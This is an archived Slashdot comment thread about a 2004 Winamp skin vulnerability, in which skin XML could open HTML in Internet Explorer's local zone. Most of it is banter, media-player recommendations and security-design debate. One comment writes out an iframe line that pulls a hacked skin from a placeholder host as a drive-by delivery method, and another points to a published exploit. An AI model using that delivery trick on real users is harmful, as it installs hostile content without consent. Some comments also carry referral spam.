I don't know exactly how it works, but certain streams will pop open the Winamp browser window to the stream's home page and the stream's home page has popups.

In fact, due to integration with IE, even if you don't use IE for any browsing, someone could set up an enticing stream (**cough**pr0n**cough) and infect a lot of people with malware who think they're safe because they never websurf with IE.

Re:winamp skin

[maximilln]

I believe it's due to winamp's integration with IE

It's because Winamp uses XML to parse skin archives which allows hotlinking to untrusted locations.

Now, if we could get rid of this crack like addiction to one-click computing, the skin file would have a README which would tell the user to copy the files to the appropriate location. While the majority of users would blissfully copy the .exe along with the rest at least it wouldn't be executed.

Of course, then there'd be a web-page someplace with a link just to check to see if the skin had been installed in a default location with the .exe intact. It's a distributed approach to chipping away at security. This is the same thing that happens to people who install dozens of "cuteware" apps. Each one breaks something else a little more until eventually there's a hole in the system.

haven't used WinAmp in 5 years.

[cetan]

That's why I use QCD:

http://www.quinnware.com

Re:School must've just gotten out.

[machine+of+god]

I notice the average vocabularical IQ drops about 50 points once 3pm EST hits.

vocabularical.

I believe you were saying something?

revenge

[bersl2]

I'm pretty sure the llama is tired of getting its ass whipped.

How to fix IE, Safari, and everything else...

[argent]

ANY library that works like the Microsoft HTML control (this is what Microsoft calls all the non-trivial bits of Internet Explorer... the IE application is just a thin wrapper around this) is at risk for exploitation. The only way to be sure that nobody's going to break out of your sandbox is to make sure that the application that creates the sandbox is the application that controls access from the sandbox, and that any helper applications it calls unconditionally implement their own sandboxes.

If you use the *same* application, API, or application binding (eg, the file type bindings used by the desktop and the MS HTML control, or Apple's LaunchServices) for both sandboxed and trusted objects, then you open up the possibility that an untrusted object will look like a trusted object, or that an untrusted object will be passed to a handler that isn't inherently safe.

Apple blew this with launchServices, and they still haven't really fixed the underlying problem. But they've only been in denial a few months, whereas Microsoft has been in denial about this for seven years, so let's look at Microsoft...

Let's suppose the HTML control was split up, so it only did rendering. Whenever it wanted to open a file, open a URL, run a script, load a plug-in, it would ask the parent application "what do I do about a CHM file" or "what do I do about <script language=vbscript>". You'd have an "HTML-only control" and a "Web Access control" and IE would be a very slightly thicker wrapper around both.

So then you register "Word Viewer"[1] with Outlook and IE as the helper application for Word documents, and "Word" with Windows Explorer as the helper application for trusted Word documents. If this was done, then Outlook (which would be a sandboxing application in this model) would open "Word Viewer" for untrusted documents.

Viola, no more email-spread Word macro viruses.

Similarly, Outlook would decline to run VBscript, and IE would decline to run the Windows Update plugin... you'd have a Windows Update program that was a thin shell around the HTML-only control... one that only opened windows update.

Microsoft could have their cake and eat it too, and EVERYONE would have a more secure and less spammy environment.

Winamp 2.xx.....

[darth_silliarse]

...is not affected and us sensible users browse with Mozilla/Opera/NotIE as the default so whats the big deal? Who the fuck uses the crappy bloated recourse hog that is 5.x anyway.... ah Internet Explorer users. Bless their cotton socks.... MORE TOOLBARS AND GATOR APPZ AND SKINZ PLEEZE. Makes life worth living watching an Internet Explorer user suffer!

Re:Winamp 2.xx.....

[CritterNYC]

Who the fuck uses the crappy bloated recourse hog that is 5.x anyway.... ah Internet Explorer users.

5.x playing in the background using 0% CPU and under 6mb of RAM... about what 2.x uses... with a feature-set comparable to iTunes without the huge iTunes resource overhead, 3 installed services, etc, etc. A "lightweight" media player like foobar2000 is ~1% CPU and 11mb RAM.

Re:Winamp 2.xx.....

My only recourse is to not use such a resource hog.

Re:Winamp 2.xx.....

Yet the Winamp 5.x user interface is slower and less responsive than 2.x.

Re:Winamp 2.xx.....

[chickenmonger]

Winamp only seems to use that much memory if you have a large playlist. If you just double click to play the files you want to play, having only one song in the playlist at a time, the memory use is much lower. Perhaps somewhere around 2 or 3 MB.

Re:Winamp 2.xx.....

IMHO foobar2k is going beyond "lightweight" .
for minimal usage I'm using 1by1 - never goes beyond 3-4mb Ram. :)

http://www.uni-frankfurt.de/~pesch/#1by1/

Re:Winamp 2.xx.....

[AnyoneEB]

Oh? Seems to be pretty much identical in responsiveness and appearence to me. Or did you install that awful thing called "modern skin support"?

Re:Winamp 2.xx.....

Thanks for your completely meaningless and unverifyable statistics.

using 0% CPU

Can you give that to me in instructions per second? Or at least CPU cycles per second (usage * clock rate) and processor class?

under 6mb of RAM

With how large of a playlist? And how many plugins installed and running?

Foobar takes ~35 million processor cycles per second on a P3 during playback. Running minimized with a total of ~1,500 songs in its playlists it has about a 2.5MB working set.

Re:Winamp 2.xx.....

[CritterNYC]

Thanks for your completely meaningless and unverifyable statistics.

using 0% CPU

Can you give that to me in instructions per second? Or at least CPU cycles per second (usage * clock rate) and processor class?

Since the usage is zero (below what Task Manager can measure), it can't be calculated without using another measurement tool, which I don't have installed. It's running on an AMD 64 3200+.

under 6mb of RAM

With how large of a playlist? And how many plugins installed and running?

1 song (same song) in the playlist on winamp and foobar, no plugins. We're talking base installs here, which is always assumed unless otherwise specified.

Foobar takes ~35 million processor cycles per second on a P3 during playback. Running minimized with a total of ~1,500 songs in its playlists it has about a 2.5MB working set.

Interesting, considering my fresh download/install of the latest version consumes 11mb with just that 1 song in its playlist. Oh, and all numbers are what it settles at (both players consume more CPU/RAM when launching a song).

Uh... footnote I forgot...

[argent]

[1] I'm assuming that Word Viewer does not implement Word macros. It doesn't seem to, but if I'm wrong about this then (since we're in a hypothetical world) let's assume there's a version that doesn't.

old....

[syncore]

This exploit was discovered about 4 months ago :-/

More support for JWZ's audiocock technology.

[argent]

Yet another reason that skinnable apps are evil.

Super-simple MP3 Player

[Dracolytch]

Since we're on the topic. Does anyone know of a super-small/simple MP3 player that just plays from my system tray?

I want a music player that has no skins, no visiualizations, just a small program that keeps track of a playlist, plays music, and stays out of my way.

~D

Re:Super-simple MP3 Player

[Animats]

Try Freeamp/Zinf, the open source replacement for Winamp.

Of course, they had to put in "themes", but at least it doesn't download them itself.

Re:Super-simple MP3 Player

http://quark.sunsite.dk/

Re:Super-simple MP3 Player

[Kurrurrin]

Foobar does
http://www.foobar2000.org/
Handy, simple, small, and will go straight to the system tray.

Re:Super-simple MP3 Player

Winamp Lite 5. The installer is less than 1MiB.

iPodService.exe

Cuz you CANT LOOK BACK !!!!

iPodService.exe which Apple gratuitously installed when I tried to upgrade my Quicktime, won't quit.
TaskManger/Select iPodService.exe/End Process and I get a message that says Access denied.

Thanks Steve Jobs !!!!

Thanks for giving me something I didn't ask for.

Thanks for making it so that it doesn't respond to "End Process" commands.

Thanks!

Re:iPodService.exe

[feroxy]

type "services.msc" into run, look for "ipod service" in the list, double click and set startup to disabled. sorted.

Re:iPodService.exe

[ChoGGi]

you can end any task with this
http://www.diamondcs.com.au/index.php?page=t askman

Re:use firefox

[strictfoo]

that was the ugliest attempt at trying to create a link in the history of mankind. It was horrible on two levels.

1. You don't know how to create a link using either the slashdot

<URL:>

tag or a standard anchor tag.

2. The link you posted redirects to a specific file, so why not just link to that? http://ftp.mozilla.org/pub/mozilla.org/firefox/rel eases/0.9.3/FirefoxSetup-0.9.3.exe

might want to release that patch...

[uodeltasig]

Since the forum basically gives step-by-step instructions of how to recreate the exploit they might want to release the patch sooner or edit the forum post so that happy script-kiddies have to do a little more work then copying and pasting to exploit it... Meanwhile, switch to linux and use XMMS :)

Re:might want to release that patch...

Correct me if I'm wrong but doesn't XMMS use Winamp skins or at least it did the last time I used that crashing piece of shit.

Re:might want to release that patch...

[uodeltasig]

XMMS has the ability to load winamp skins, but doesn't auto-install/launch/set-it-as-default like winamp does. I personally say XMMS has the better approach, this situation is a great case for that... if I click a picture and get a XMMS/Winamp skin I prob. won't download and install it... I understand why people are getting defensive about winamp as it's a great product, but since when did people start siding/defending M$... "...I'm using Windows, and so XMMS is not an option." (your mistakes are emphasized by me) "Why would I change my entire operating system..." Why would you want to open your system up to infinate amout of security holes? Who knows... I thought ./ blocked all the *.microsoft.com posters, if not they should.

Re:School must've just gotten out.

[TaintedPastry]

:-p

Dumb Answer

[Iscariot_]

"so I may not understand the deeply compelling reasons driving such a design decision."

*raises hand*

Because since the late 90s EVERY PROGRAM must use the internet in some way. Useful or not. Anyone else notice this trend?

back to media player..

[nurb432]

"Good ole microsoft has this thing called media player that plays my mp3's..."

"Cant trust those evil 3rd party hacker programs... Thats what they say they wouldnt lie.. See this just proves it.."

Not that Microsoft would be *that* evil to release exploits for 3rd party apps.... but its an idea..

Re:back to media player..

[botsmaster25]

Ahhhhhhhhhh.........Linux FUD.

Yes. MS would do it because they are so evil. Does Winamp even run on Linux?

If not, why would MS attack a Window app?

Re:back to media player..

Netscape was a Windows app, too, and they made killing that priority #1...

Winamp's or IE's fault?

[CodeMaster]

Still trying to figure out - is it winamp's fault that an XML character escape sequence causes stupid IE to run as in a local zone.

This isn't the first app that gets nailed just because it was using IE (for whatever extent of use - full rendering or peripheral stuff like SSL Certificate handling or XML processing).

Just add this to the IE screwups tally :-)

get a free iPod![This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier :-(]

Re:Winamp's or IE's fault?

[TrancePhreak]

Since Nullsoft is adding a patch for this in a future version, I would say it's their fault and not IE's.

Re:Winamp's or IE's fault?

Apparently it works in firefox too, so it is not so much a problem with IE as it is Winamp.

Re:Winamp's or IE's fault?

[CodeMaster]

Not exactly.

And for the "it works in Firefox also" comments - well, it doesn't. Not exactly... Firefox will allow you to save the file, but when you open it, it will open using winamp, which uses IE for the XML handling - thus opening itself for the exploit.

Nullsoft's patch will probably address the appropriate zone permissions it's XML files are
executed" in within IE, or just not use IE's engine for the XML stuff.

get a free iPod! [This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier :-(]

Re:Winamp's or IE's fault?

[nezroy]

Uh, just because WinAmp is nice enough to put out a patch that will protect you from IE's vulnerable behavior does not mean it's their fault in the first place. Kinda like the whole Mozilla thing.

Re:Winamp's or IE's fault?

[Keeper]

The zone content opens in is configured by the application hosting the browser control. IE is doing exactly what winamp stupidly told it to do -- open the content in the local zone.

Another super-great use of XML...

There is no earthly reason why a skin should be XML, other than to say "we have XML support". Just another misuse of XML.

Add it to the ever expanding list.

I call 1-800-INFINITELOOP

Nope. Real is much better behaved that quicktime/Ipod.

Your talking ancient history maybe.

Furthermore, Real has always been a good citizen on Linux. While microsoft and apple refusled to support Linux, Real did support Linux.

Real may have behaved badly at one point on Windows, but Ipod is behaving badly now.

0day exploit in the wild

[Jinsengo]

seems that this flaw was reported by the french website security company K-Otik (http://www.k-otik.com) who made this private exploit code goes to "public"

OT: Great flensing pic

[cuzality]

There's a great pic under "Whaling" over at Wikipedia -- sadly, no entry for "flensing".

....
Fav new Firefox extensions: User Agent Switcher

i'm famous!

[DaWolfey]

I've never been linked to (well, indirectly) on slashdot before - it's my 30 seconds of fame!

Just to add to the original thread a little, I only saw the worm spreading on IRC and I only saw 2 people who were spamming the link - like all mirc worms the infected person doesn't know they are doing it until someone tells them.

I guess it's not got very far - since I reported the exploit i've not seen another spammed link for it.

All Versions?

[Gates82]

I still use winamp 1.90, I highly doubt that it will be affected. Besides what's a skine?!

Re:Are you from a swing state?

[LilMikey]

Screw that... If it's a diebold a slightly creative person could get who everyone voted for and change them right there on the spot.

Integration of Access in a Diebold machine is a much more serious offense than integration of IE in a WinAMP.

Bad eye candy

[EmbeddedJanitor]

It used to be that eye candy was just cute stuff that did no harm (beyond eating some extra CPU and RAM). Now we see that eye candy can be used to do bad things too.

While the finger currently points at WinAmp skins, I guess all eye candy with XML etc could potentially be used to do the same thing.

Re:Bad eye candy

Yes 'you' 'guess'... In other words you are stupid. You don't know anything about the topic, but you make stupid guesses. Thanks!

The RIAA press release....

[endersdouble]

Not only does evil P2P software break the law, it helps infect your computer! A program called Winamp, used by illegal copyright infringers to play their music files called MP3s, has a security hole allowing evil hackers to enter your system! We need to band together to ban this evil and dangerous Winamp program. Remember, no matter what, it is WRONG to use Winamp to play downloaded MP3s--and now, it is dangerous. Respect copyrights; uninstall Winamp.

Old Version

I recommend Winamp 2.95 (for all the flavor of Internet TV and Radio without all the bloat).

OldVersion.com (wonderful for pre-bloat Acrobat Reader >=v5.0 et al.) has a great selection of Winamp flavors for all those who want a faster (and more secure) version.

Enjoy.

Is calculator safe?

[rs79]

In related news, our editors today learned of the calc_virus; remote explotation of Windows Calculator utility is possible and attackers can gain access to your machine via this program. The announcment that MS recommends you use an abacus was heralded as a remarkable advance in system security

I think I speak for a lot of people when I say...

[rd_syringe]

...pointless skins for media players can go to hell. Foobar 2000 forever!

iTunes you bastard!

[revscat]

No! Thou shalt worship no other gods but iTunes! All other MP3 players shall be banished to the topmost rung of RedMound for your heresy! BACK! BACK, I SAY!

Cthulhu n'garn N'gah K'thuun pinkybrain!

Re:iTunes you bastard!

you apple zealots really need to get your heads checked.

HOW QUAINT

Another IE exploit.

You know, one of these days, someone's going to have to develop a real anti-virus for Linux. And Unix. And BSD.

And a defragger...

Even more fun...

[jejones]

The last time I tried it, WinAmp wouldn't work for me unless I had administrator privileges--so this exploit can do maximal damage. Maybe this will move a rewrite to work reasonably in a multi-user environment up on their priority list? (We can hope...)

Re:School must've just gotten out.

[ranolen]

Speaking of low IQ, school is still out for the summer in most parts.

The exploit:

[Agilo]

The exploit was posted on SecuriTeam: http://www.securiteam.com/exploits/5TP0Q1PDPM.html

Re:The exploit:

[gui_tarzan2000]

Speaking of exploits...

When did this become a common problem? When I used to program way back in the late 80's software code was simple and clean. We didn't really have issues like this to worry about. The occasional virus, but those were actually .com or .exe programs. I know the Internet wasn't in place for the public yet, but still. And I know about the Unix worm. But isn't the main reason this is happening because coding gotten either that sloppy or that disorganized?

As much as I hate Microsoft, I don't blame them for things like this although they have not set a good example. There are thousands of programmers to blame for sloppy code, bloat and security issues so we can spread it around a bit.

Foo!

[ralphus]

Why are you geeks worried? Shouldn't you be using Foobar2000 anyway? It is about 2000 X better than winamp and packed with geek friendly features.

Re:Foo!

yes. an application designed to play music, without a ui widget to adjust the volume. GENIUS.

Re:Foo!

Most users have a little "speaker" icon in their systray. Use that. See, volume widget redundant.

Re:Foo!

[r00k123]

Packed with...nuh uh. Open Winamp with a full playlist. Press J. Type something. MUCH slicker than Foobar's attempt at the same feature. "Jump" alone keeps me on winamp..

skin

[damned_in_davis]

nothing that a thin film of miconazole nitrate on the monitor can't fix in 2-3 weeks...

say it out loud...

...it's another WINDOWS problem. The OS and any apps for it are "run at your own peril". That includes mozilla stuff. It's because it's designed to run on WINDOWS.

WINDOWS
WINDOWS
WINDOWS

I don't care how leet folks think they are, as long as people run windows stuff, develop for windows, run windows apps, think about windows, they are gonna get hosed, sooner or later.

You would think after 10 years of this stuff that it would be noticed, nope, folks still think just one more patch or one more version higher of their windows apps or OS is gonna magically fix windows.

Charlie Brown

Lucy

Lucy holding football

Charlie Brown on his butt looking lame

Charlie Brown = windows

Lucy = windows apps

Lucy holding football = thinking just this one more time, that this is the time she will hold it correctly, that just this time it will work and be "secure"

Charlie Brown on his butt for the 9,863rd time = windows users, never learn, always going to think if they hold out one more time it will be OK.

Re:say it out loud...

[arminw]

Is there NO way to tell *any* flavor of Windows to allow any or all programs to write to the user directories only, by limiting the privileges of a user? In Linux and the Mac it is possible to disallow a user or any program he may run from touching anything that might affect the system. Therefore, if a user is dumb enough to run unknown programs, only his/her stuff gets deservedly hosed.

Re:say it out loud...

Is there NO way to tell *any* flavor of Windows to allow any or all programs to write to the user directories only, by limiting the privileges of a user?

Of course there is, in fact with greater granularity than Unix permissions allow. The problem is, if you blanket deny write access to anything but the user's directories, many programs break.

Too much stuff is written by programmers who think that writing to the application directory is ok. It's easy enough to enable write permission to individual files to get around this (and registrey keys in some cases), but doing it for about half of the installed programs gets old really quick. And that's after you determine which files/keys they need write permission to.

So if you're not a Windows expert and don't have one around, practically speaking it's impossible.

Re:say it out loud...

[mpe]

Is there NO way to tell *any* flavor of Windows to allow any or all programs to write to the user directories only, by limiting the privileges of a user? In Linux and the Mac it is possible to disallow a user or any program he may run from touching anything that might affect the system.

The problem is that many Windows apps (n.b. not just old applications) are written using a "personal computer" design which assumes that the person sat in front of the computer can alter anything.

Re:say it out loud...

[mpe]

Too much stuff is written by programmers who think that writing to the application directory is ok. It's easy enough to enable write permission to individual files to get around this (and registrey keys in some cases), but doing it for about half of the installed programs gets old really quick. And that's after you determine which files/keys they need write permission to.

Don't expect much help from the program supplier though...

Re:say it out loud...

[arminw]

Thanks for the insight...

It seems that until MS can change these practices by program writers there is no real hope of them *ever* coming up with a secure system.

However, meanwhile, it seems that MS or someone could write a utility that would deny all permissions to any and all system related things and then make it easy for the user to give permissions to selected programs only -- one at a time as they were run the first time.

It means that MS users will have to bite the bullet and do a little more work initially and maybe replace some of their software. If such a system were in place, any malware that a user may download could not run surreptitiously, but would have to ask for permissions first. A user could be warned not to approve if he/she is not sure of the source of the file that is asking for permission.

Security and convenience, even in the real world, are at odds and this extra work, it seems to me, most users would not mind if it prevents their systems from being messed up against their will or knowledge. If they DO give permissions to questionable code, then they deserve to have their systems hosed.

It isn't just the skin...

[poohsuntzu]

It's how it is delivered. The simpilest way involves:

iframe src="http://www.blah.com/winamphackedskin.wsz"

That right there, in any browser, will initiate a download of the winamp skin file. In Opera/Firefox/Mozilla you are given a download confirmation prompt. However, if IE is your default browser then IE will auto download and install the winamp skin without your knowledge.. or at least until your winamp pops up suddenly with a new skin. We can't tell people to "don't download skins" merely because it's far more serious than that. Manual skin changing or not, that iframe trick is going to nail a lot of people.

The best bet would be to ignore winamp completely until a patch can be provided, or have Firefox set as your default browser.

LoL

Who the hell cares, I use XMMS like a real man. I hope all you microcrap windows users get viruses from your ad based spyware programs.

Re:Foo?

[Ozwald]

Slashdot geeks using Windows. Hmph. I would have expected mpg123/mixerctl. Oh well. Whatever works.

Oz

I'm surprised no one's plugged quinnware

[Zancarius]

In spite of all the shameless plugs for various assorted flavors of media players, I haven't seen one plug Quinnware yet. More specifically, their Quintessential Player. Sure the default interface might not be as "nice" as Winamp, but if you're using that OS from Redmond, WA, you get a player that also includes CD ripping/mp3 encoding.

Apologies ahead of time for the shameless plug, but I figured it's only fair to list alternatives in addition to the ones already provided!

Suggestion to Windows yet NON-IE users

[Spuffin]

Use Work Offline mode in IE when you aren't using it. This setting will be saved even when you close IE thus keeping IE exploits such as this down. As a side note, it also kills the ads in AIM which is a nice plus. The only downside is when a program does try to access the internet using IE (such as AIM) it prompts you to Stay Offline or Connect. All you have to do is click stay offline and you'll be fine. If anyone knows how to suppress this prompt I would love to hear it.

Re:Foo?

[ralphus]

Foobar2000 is the only reason I keep a Win32 machine going at home. It has a kicking sound card and digital interconnect to my amp. Of course it is getting all it's music from FLAC files stored on a RH9 server running Samba.

No other audio player can touch Foobar2000 in terms of quality or flexibility.

Further evidence that [the internet] is stupid

"Seems to me I was just bitching about skinning [slashdot.org] and mentioned that security holes were one possible (but unlikely) down-side. I love when the universe makes my point for me."

If security holes are proof that skinning's stupid? Then likewise browsing the Internet is stupid. OK, everyone shut 'em down. lets all head home. It's not safe out their.

RTFA (not an Internet Explorer bug)

[KJKHyperion]

An XML document in the Winamp skin zip file can reference a HTML document using the "browser" tag and get it to run in the "Local computer zone"

Do you see the problem here? Winamp embeds the whole Internet Explorer application, not just the HTML rendering control. That's rarely a good idea, since you effectively lose control over your own application - for example, Winamp is "restricted" by the Internet Explorer policies based on zones, instead of disabling active content period

...it makes me wonder...

[Zx-man]

...when the best open-source *nix audio players (mpg321 & ogg123, of course) will get their skinning enabled?

P.S. By the way, I might suggest that you, the ones still using WinAMP, to start migrating to the more compact (both on the HDD & in RAM), free (as in ``free beer''), almost-equally-featured (expect for the auto-execution of the skinning scripts, emphatically...) and, what really matters, not as baroque, state-of-the-art universal audio players for the win32 & compatibles (and, by using WINE, under the GNU/Linux too), - ``XMPlay'', see http://www.un4seen.com || Alternately, use the open-source, quite reach featured and cross-platform ``Zinf'' (ex-FreeA*p) - http://zinf.org

P.P.S. Or, quite a way better, stop listening to digitized music at all, mha-ha-ha! ;-)

Skinned, Kremed, and Creamated...

[davidsyes]

I CANNOT help this...

All in one day...

1. WinAmp is being skinned alive

2. Cremators settle for $80M suit

3. Krispy Kreme profits fall by 1/2

1. is at (redundantly) http://slashdot.org/articles/04/08/26/1919249.shtm l?tid=172&tid=1&tid=218

2. http://story.news.yahoo.com/news?tmpl=story&cid=51 9&ncid=519&e=2&u=/ap/20040826/ap_on_re_us/cremator y_lawsuit_8

and

3. http://news.yahoo.com/news?tmpl=story&u=/nm/200408 26/bs_nm/leisure_krispykreme_earns_dc_9

Talk about skinning, slashing and burning...

DOH!

David Syes

Re:Skinned, Kremed, and Creamated...

[davidsyes]

Oh,

On top of that, the Crematory and Krispy Kreme articles were adjacent to each other on the Yahoo! page.

As for the Romans and their crematory, they'll have to "burn through a lot of cash" to make a profit/return to profitability. They're REALLy going to have to BURN their way back to profits, if the courts or the state don't fry them alive.

As for Krispy Kreme being CREAMED, I can't fathom how a business or an industry expects to increase Q over Q profits with a basically unhealthy business model -- one that idealistically presumes people will be RESPONSIBLE for their own health but factually depends on people eating their way into a grave or a heart operation (and as a nation we pick up the tab for each and every piece of junk putting some obese or morbidly obese American or insured visitor on the procedure table or the post-mortem gurney). It's only inevitable and logical that the more educated people become the more they should cut back on JUNK or compensate by drinking more water, exercising more, and watching their sugars, salt, calories, and other levels. (About two weeks ago, I ate a KK donut and my teeth and gums hurt like hell for a few minutes. I don't recall that from other donuts, but Snickers and 3 Musketeers and some but not all candy bars give the same sensation of having needles run thru my teeth or gums. Quite unpleasant. I better see my dentist...)

Futile

I live in a swing state (not one you mentioned). But Kerry should be leading in this state by 40 points, not the 3 he's currently leading by. He's screwed.

You might as well just vote for Michael Badnarik.

Let me take this opportunity to say...

[fm6]

I hate skinnable software. It's less reliable and harder to use than software that just follows standard L&F APIs and conventions. My particular unfavorite is PowerDVD, which I'm forced to use because its the only software I have that groks my DVD drive. It would have been so easy for them to just provide a simple menu and/or toolbar at the top of the display window, with standard, self-explanatory controls. But no, that wouldn't be cool. So instead I have to poke at mysterious icons and an unusable progress bar on a separate control window that doesn't even coordinate its Z-level with the display window! Argh!

If anybody wants to recommend their favorite open-source Windows or Linux DVD player, feel free. But if it's skinnable, I'm not interested!

WFM...

[Apathetic1]

WinAmp 2.91 works for me under Windows 2000 with User priveleges. I haven't tried WinAmp 5 because I hated WinAmp 3 so much...

duh

Who let's winamp pass through their firewall anyway? That's like hooking up with a homeless woman without a condom.

Sorry Gary, I love you buddy, but when you hooked up with that homeless woman, I realized how suicidal you really were. Oh ya, and you made out with my ex-wife too! LOL! You so crayZEEE!

Security 101: Don't let any process have access to the internet unless you absolutely need it. Having Winamp look up the titles of your ill gotten mp3 files does not sound like a sound security strategy to this sap!

But then again, I was the one that married Janelle!

Re:Foo?

It's for the subset of slashdot geeks that think having a player that handles 48-bit audio makes a difference. (Nevermind that most of their music is 128kbps mp3s downloaded from kazaa, and they have a cheap commodity soundcard and speakers) To them, FooBar2000 just sounds better, and it's useless to try and debate it.

Help, can't skin MP3 Player!

[eyepeepackets]

I looked and looked but there are no skins for my mp3 player. Is it lame or what? Am I just another maroon (thanks Bugs) who happens to be skinless?

Player: cmp3
Where: freshmeat.net

Any help with this skin problem is way too much! :)

java apache httpd == tomcat (standalone)

[Ayanami+Rei]

panic in the streets!!

[bruddah]

My sysadmin commanded all his minions to uninstall WinAmp "immediately"!! He reckons that "Since the software manufacturer has yet to issue a patch, the only workaround at this point is to uninstall the software"

Get a grip dude. The problem is only applicable if you
* habitually download 100's of winamp skins
* get dodgy software off IRC
* allow automatic switching of skins in your winamp Preferences

This scaremongering is a capitalist ploy hatched by the corporations, RIAA, BSA, and the Illuminati, to force you to use the festering pile of crud called 'Windows Media Player'..

One good thing is that I have discovered the joy of foobar2000 instead :o)

I think *I* speak for a lot of people when I say..

Don't be taken in by this idiot--he has accounts under the names bonch and Overly Critical Guy. He has a history of astroturfing for Microsoft, bashing anything Open Source, using lies and half-truths to get modded up, karma whoring, and the usual trolling (under his bonch account, he got a troll posted to the front page of Slashdot).

All you have to do to check the veracity of this is to look at the posting history of his two old personnae (linked above) and his current one to figure it out.

Please do not mod this jerk up--every time you do the Slashdot S/N ratio goes down while bonch/Overly Critical Guy/rd_syringe just laughs at you.

This has been a public service announcement

you forgot..

[ashot]

if you aren't a moron you are also NOT affected.

Yes, there is a way to get windows without IE

Predictably, you've already gotten an 'authoritative' no answer. That poster is wrong. There is a way. I use it, and it's great. LitePC makes 98Lite (for DOS based Windows versions 95, 98, 98SE, ME) and XPLite (NT based Windows 2000 and XP.) It's a WONDERFUL thing if you have to use Windows.

Easy answer

Back in the old days, there were no need for security because nobody but you had access to the machine anyways. It's incredible to think of how floppy-viruses propagated compared to the Internet today. But essentially, there were no "hackers" that could take you down via the phone-line. Back in those days, that was considered a joke on the ignorant.

The more convenience and interconnectivity you offer, the more security you need to implement at all those gates and pathways of code.

The reason for so many security holes are twofold:

1) Ignorance conserning security among programmers. Implementing features without making security-layer AT THE FOUNDATION. Adding security after the first designs, always fails horribly. Security and convenience seem always to be at odds with eachother, so security gets lower priority.

2) True and tested methods of programming are not so secure. Using programming-languages / libraries with no checks and balances of possible overruns is Bad. It's like inviting hackers to break your code. If everyone used Java or some compiled language with protection, most exploits would dissipate.

Obvious: Advancing hacking expertise among white/black-hats. Somebody is always eager to learn new ways to break others' efforts. The methods are in many ways the same (stack overflows , mangled input, etc), but with encryption and authentication protocols, there's always new challenges even the methods stays relatively the same.

The next step in security is to build everything with stack-overflow protection. As is done in Open BSD and a few hardened Linux distributions. There is really no reason why overruns shouldn't be prevented as much as possible. Using insecure methodologies, new code will always pose a higher risk.

The simplest answer is:

Security is just not as sexy as Features.
Features are really, really sexy, and people pay money for Features. (She's hot!)

So I believe programmers aren't necessarily more sloppy these days, it's just that the consciousness for security is lacking because Features have enthralled everybody's mind!

When will software companies and developers learn?

[inkswamp]

Does it take a freakin' rocket scientist to figure out that any time your software does something automatically, especially if it's something dealing with the network/Internet, you should think very carefully about how necessary the feature is? That is, consider whether it should even be there at all. It seems that a lot of security issues could be stopped if developers and software companies would just let the user decide when and (most importantly) if at all a piece of software does something automatically. At the very least, there should be a way to turn the feature off and the developer should ship with the feature disabled by default.

Flensing?

[Pan+T.+Hose]

Can I name the worm?? I propose "flensing."

Having read Winamp's EULA, I believe "circumcision" would be much more appropriate.

Re:Foo?

Oh, so that's what "geek friendly" meant? "Gives you an excuse to keep an extra PC on your desk".

Maybe, but XP breaks NotePad...

[ebonkyre]

No, seriously.

NotePad in XP has major bugs not present in earlier versions, such as when you save a file, the current Word Wrap margins become actual line breaks. The saved file is fine but the open document now has hard CR/LFs in it, so if you save it a second time without closing and reopening the file, the file is corrupted.

Wait.....

I think that the issue may not totally be Nullsoft's fault as they are just using the IE engine for the browser function in Winamp. Let's point the fingers at who friggin broke the damn browser years ago.

Re:I think *I* speak for a lot of people when I sa

someone astroturfing for microsoft and bashing open source is posting about how media player skins are bad and linking to an open source media player?

Re:Foo?

[ralphus]

no, I keep my music/video PC where it belongs, in my AV rack.

Re:yet another way... Data vs. code

[McFly777]

It's a major security problem when people download untrusted winamp skins on IRC.

The issue that I have with this is the lack of separation between data and code. I know that "skins" can be more than just a bitmap that gets applied to the window background, but why do they need to be? To begin with I don't see the need for the skin for an application to be able to execute code. Keep the data in the skin limited to a few bitmaps, tagged as to what they should be applied to.

I guess I am thinking like 'mod' files for the original Doom series (haven't messed with quake or later...), sure you could instruct it to place the walls in goofy places, and make them look different, but you couldn't give your character the ability to fly, etc. because you weren't writing code to be executed; you were only supplying data that the existing code would reference.

I reserve the right to be stupid about this, but it seems so simple.... so I might be missing something.

Winamp 5.05 posted....fixes exploit

Nullsoft has updated their website with Winamp 5.05. This build fixes the security exploit that was reported. good times.